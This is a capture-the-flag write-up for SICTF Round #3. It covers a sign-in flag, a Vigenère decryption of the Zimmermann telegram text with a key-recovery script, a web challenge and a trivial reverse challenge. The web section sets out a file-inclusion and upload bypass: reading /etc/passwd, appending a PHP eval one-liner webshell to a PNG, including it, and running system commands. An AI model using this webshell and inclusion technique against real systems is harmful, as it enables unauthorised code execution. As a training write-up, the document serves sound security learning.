SICTF Round#3 Writeup

Misc

Sign-in

SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53}

Crypto

[Sign-in] Vigenere

Attachment contents:

Gn taj xirly gf Fxgjuakd, oe igywnd mt tegbs mnrxxlrivywd sngearbsw wakksre. Bs kpimj gf tank, it bx gur bslenmngn th jfdetagur mt ceei yze Ugnled Lystel tx Amxwaca gjmtrtq.

An taj wvegy gf tank nom xmccxjvinz, bw prhugse ts sllbffce hs lhe ytdlopnfg btxas wbyz Meqnuo: Tafl we lmsll ffce wtw logxyzer tsv madj heavj logxyzer. Pj khaeq yivLNUTF{4695vft9-fd68-4684-uj81-u6c1avg6uaft}j yenxwgus ynfanvnsl snuhorm, ffd ag zfdekxlanwnfg og tmr ptwl thty Eexbhg is mt jechsiuek yze lhxl tekwatokd an Nxb Eexbhg, Teqfk, anw Fjizhss. Thx iwtabqk of ljltlxrwnt tww leyy lo yhz.

Qou tww inlyjucmjv to bsxorf yze Pkjkidxsl [of Fjpich] tx thx ftovx nf thx ljeamjkt chsxidxsue al xgon tx at il hwrttnf thty lhekj oile gw an hzlbrxfc of pfj wimm lhe Nsatew Xlatxx snd lzygely lham yze Pkjkidxsl, on ank owg nfitbflivx, nfvimj Bapts lo ifrwdityw adajjenvj oita yzis iqsn; am yze strw tifj, gffxw lo mxiaatx gwtwxjf Jaiff anw tmrsxqnes.

Iqwasx hsll mt lhe tylenmngn oy yze Pkjkidxsl thty lhe kzlhlxxk emiqgymxsl of hzj suursrigjk nop txfekx lhe iwgspxhl of vtepeeqang Xsylagi lo mtpw pethw in t kww mhslhs.

Decrypt the Vigenère cipher with an online solver (https://www.guballa.de/vigenere-solver):

On the first of February, we intend to begin unrestricted submarine warfare. In spite of this, it is our intention to endeavour to keep the United States of America neutral.

In the event of this not succeeding, we propose an alliance on the following basis with Mexico: That we shall make war together and make peace together. We shall givSICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}e generous financial support, and an understanding on our part that Mexico is to reconquer the lost territory in New Mexico, Texas, and Arizona. The details of settlement are left to you.

You are instructed to inform the President [of Mexico] of the above in the greatest confidence as soon as it is certain that there will be an outbreak of war with the United States and suggest that the President, on his own initiative, invite Japan to immediate adherence with this plan; at the same time, offer to mediate between Japan and ourselves.

Please call to the attention of the President that the ruthless employment of our submarines now offers the prospect of compelling England to make peace in a few months.

SICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}
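The same flag can be recovered without the online solver, because the flag prefix SICTF is known plaintext sitting inside the ciphertext. The following is an added example, not part of the original writeup; it assumes the key length equals the crib length (5), and the function names are illustrative.

```python
import re

# Ciphertext fragment copied from the attachment above (the sentence holding the flag).
CIPHERTEXT = "Pj khaeq yivLNUTF{4695vft9-fd68-4684-uj81-u6c1avg6uaft}j yenxwgus"
CRIB = "SICTF"  # known plaintext: the flag prefix used in this CTF


def key_from_crib(ciphertext: str, crib: str) -> str:
    """Derive the repeating key, aligned to the first letter of `ciphertext`.

    Assumption: the key length equals len(crib). Confirm it by checking that
    the decrypted text reads as English.
    """
    brace = ciphertext.index("{")
    enc_crib = ciphertext[brace - len(crib):brace]
    if not enc_crib.isalpha():
        raise ValueError("expected letters immediately before '{'")
    # Key letter = ciphertext letter - plaintext letter (mod 26).
    frag = [(ord(c.upper()) - ord(p.upper())) % 26 for c, p in zip(enc_crib, crib)]
    # Only letters advance the key, so count the letters before the crib.
    offset = sum(ch.isalpha() for ch in ciphertext[:brace - len(crib)])
    n = len(crib)
    key = [0] * n
    for j, shift in enumerate(frag):
        key[(offset + j) % n] = shift
    return "".join(chr(s + ord("A")) for s in key)


def decrypt(ciphertext: str, key: str) -> str:
    out, i = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[i % len(key)]) - ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            i += 1
        else:
            out.append(ch)  # digits, braces and spaces pass through unchanged
    return "".join(out)


def recover_flag(ciphertext: str = CIPHERTEXT, crib: str = CRIB) -> str:
    plaintext = decrypt(ciphertext, key_from_crib(ciphertext, crib))
    return re.search(r"SICTF\{[^}]*\}", plaintext).group(0)


if __name__ == "__main__":
    k = key_from_crib(CIPHERTEXT, CRIB)
    print(k, decrypt(CIPHERTEXT, k))
```

The key comes out as a rotation of the real key because the fragment does not start at the first letter of the attachment; the decryption is unaffected.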

Web

100%_upload

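This challenge tests file upload, but it has to be combined with file inclusion.
The bypass used here is an image webshell (PHP appended to an image) plus file inclusion.
There is a file parameter, and testing shows it is vulnerable to file inclusion. Requesting the following URL confirms it: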

http://yuanshen.life:37548/index.php?file=/etc/passwd


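First we upload an image webshell. Because the server checks both the file extension and the file content (which must not contain the letters "php"), capture the request with BurpSuite.
Build the image webshell from cmd with: cmd /c "copy /b 1.png+1.php shell.png"
Reference for fixing the error: powershell Copy-Item: a positional parameter cannot be found that accepts argument "+" (大数据知识库)
1.php contains a one-line webshell: <?=eval($_POST[1]);?>
1.png can simply be created with Paint.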

Then upload the image webshell shell.png; the upload succeeds.
Request this address through the file inclusion vulnerability; phpinfo() executes successfully:

http://yuanshen.life:37548/index.php?file=uploads/shell.png

Next, just read the flag in the root directory.

POST body:
1=system('cat /flag');

AntSword (蚁剑) can also connect.

Reverse

[Sign-in] Baby_C++

Open the file in Notepad and search for SICTF directly.
I can't do reversing, this is all I know how to do QAQ
